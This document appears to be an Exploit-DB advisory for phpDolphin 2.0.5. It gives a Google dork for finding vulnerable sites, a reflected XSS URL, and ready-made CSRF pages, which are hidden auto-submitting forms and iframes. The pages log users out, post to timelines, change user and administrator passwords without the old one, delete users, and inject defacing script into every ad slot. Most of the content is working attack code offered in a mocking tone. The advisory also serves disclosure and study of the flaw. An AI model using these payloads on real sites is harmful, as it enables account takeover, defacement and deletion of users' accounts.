phpDolphin 2.0.5 - Multiple Vulnerabilities

EDB-ID:

39243

CVE:





Platform:

PHP

Date:

2016-01-15


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# Exploit Title: phpDolphin <= 2.0.5 CSRF
# Google Dork: intext:"Powered by phpDolphin"
# Date: January, 15th 2016
# Exploit Author: WhiteCollarGroup
# Vendor Homepage: http://phpdolphin.com
# Version: 2.0.5

XSS (Reflected)
===============

> http://target.com/index.php?a=search&q=teste&filter=m"><h1>XSS</h1><noscript>
CSRF
====

We've found no protection against CSRF (Cross-site Request Forgery), which made possible to do any kind of act on a user (or admin) account.

NO FORMS are secured at all. But we've included some interesting examples. These examples execute actions on the user account while he's visiting a special page prepared by us in any other server. He won't know anything while visiting, as nothing is shown. Let's start from the basic:

Logging an user off
------------------

```
<img src="http://localhost/dolphin/Script/index.php?a=feed&logout=1" width="1" height="1" />
```

It's good to remember that if the user kept the "remember me" on, there are cookies called "username" and (MD5-encoded) "password".

Posting on user's timeline
--------------------------

By changing the "group" input, it's also possible to post on groups.

```
Lorem ipsum dolor sit amet :)<br/>
Take a look on your profile ;)
<form method="post" action="http://localhost/dolphin/Script/requests/post_message.php" target="hiddenframe" id="hackfrm">
	<input type="hidden" name="message" value="HAXORED" />
	<input type="hidden" name="privacy" value="1" />
	<input type="hidden" name="group" value="" />
	<input type="hidden" name="value" value="" />
</form>
<iframe width="0" height="0" id="hiddenframe" name="hiddenframe" border="0" style="display: none"></iframe>
<script> document.getElementById('hackfrm').submit(); </script>
```

Things can get a bit funnier.

Changing user password
----------------------

It's interesting that the change password form does NOT require the actual password. Just make sure "password" and "repeat_password" inputs have EXACTLY the same value.

```
<form method="post" action="http://localhost/dolphin/Script/index.php?a=settings&b=security" target="hiddenframe" id="hackfrm">
	<input type="hidden" name="password" value="hacked1" />
	<input type="hidden" name="repeat_password" value="hacked1" />
</form>
<iframe width="0" height="0" id="hiddenframe" name="hiddenframe" border="0" style="display: none"></iframe>
<script> document.getElementById('hackfrm').submit(); </script>
```

Funny enough? Not?

So let's change the administration password too. Of course this page must be accessed by the administrator.

```
<form method="post" action="http://localhost/dolphin/Script/index.php?a=admin&b=security" target="hiddenframe" id="hackfrm">
	<input type="hidden" name="password" value="hacked1" />
	<input type="hidden" name="repeat_password" value="hacked1" />
</form>
<iframe width="0" height="0" id="hiddenframe" name="hiddenframe" border="0" style="display: none"></iframe>
<script> document.getElementById('hackfrm').submit(); </script>
```

In order to open the admin panel, just visit `/index.php?a=admin`.

Want to delete some user? Just find out the user ID (numeric). For that, just open the user profile, view source (Ctrl + U), find (Ctrl + F) "userid". You will find two attributes "data-userid". That's the numeric user ID.

```
<img src="http://localhost/dolphin/Script/index.php?a=admin&b=users&delete=USER_ID_HERE" width="0" height="0" />
```

Just want to mess everything up?

Hacking site index
==================

By adding Javascript code to one or more of the advertising units, we can block anyone's access to the site. This is our payload:

```
<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>
```

And this is our code:

```
<form method="post" action="http://localhost/dolphin/Script/index.php?a=admin&b=manage_ads&m=i" target="hiddenframe" id="hackfrm">
	<input type="hidden" name="ad1" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
	<input type="hidden" name="ad2" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
	<input type="hidden" name="ad3" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
	<input type="hidden" name="ad4" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
	<input type="hidden" name="ad5" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
	<input type="hidden" name="ad6" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
</form>
<iframe width="0" height="0" id="hiddenframe" name="hiddenframe" border="0" style="display: none"></iframe>
<script> document.getElementById('hackfrm').submit(); </script>
```

Enough?

Simply all forms are vulnerable to CSRF. These were just some.